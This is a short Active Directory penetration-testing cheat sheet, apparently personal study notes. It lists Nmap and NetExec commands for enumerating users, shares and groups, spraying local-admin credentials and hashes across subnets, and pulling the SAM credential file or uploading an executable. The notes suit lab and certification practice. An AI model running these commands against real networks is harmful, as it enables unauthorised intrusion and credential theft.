Tips

Indicators of DC
- DNS, LDAP, Kerberos
Utilize https://wadcoms.github.io/ for Enumeration
[ ] PowerShell History, 휴지통 확인하기.

Tools

<aside>

Nmap
NetExec
Bloodhound
Impacket - wmiexec, psexec
evili-winrm </aside>

Enumeration

Host Discovery

Port Scanning

Nmap

nmap $IP -Pn -n --open --min-rate 3000 -p-
nmap $IP -sC -sV -p [ports]
nmap $IP -sU --top-ports 10

[ ] Check all of the Network Protocols from the Nmap Scan. Especially the following if present:
- SMB, LDAP, RPC, Kerberos, DNS
  - smbclient, rpcclient, kerbrute, ldapsearch etc.

NetExec

nxc smb $IP -u '' -p '' --users
nxc smb $IP -u '' -p '' --rid-brute
nxc smb $IP -u [user] -p [password]
nxc smb $IP -u [user] -p [password] --users
nxc smb $IP -u [user] -p [password] --groups
nxc smb $IP -u [user] -p [password] --shares
nxc smb $IP -u [user] -p [password] --rid-brute
nxc smb $IP -u [user] -p [password] --rid-brute | grep SidTypeUser
nxc smb $IP -u [user] -p [password] --continue-on-success
nxc smb $IP -u [user] -p [password] --local-auth

# Local Admin Spraying
nxc smb 172.16.5.0/24 -u [user] -p [password] --local-auth
nxc smb 172.16.5.0/24 -u [user] -H [hash] --local-auth

# logged-on-users
nxc smb 10.10.110.0/24 -u [user] -p [password] --logged-on-users

# Upload and dowonload
nxc mssql $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc mssql $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'
nxc smb $IP -u [user] -p [password] --get-file 'C:\\\\Windows\\\\System32\\\\SAM' SAM
nxc smb $IP -u [user] -p [password] --put-file gp.exe 'C:\\\\Users\\\\Public\\\\gp.exe'

Kerbrute

Kerberos 88

Bloodhound

Collectors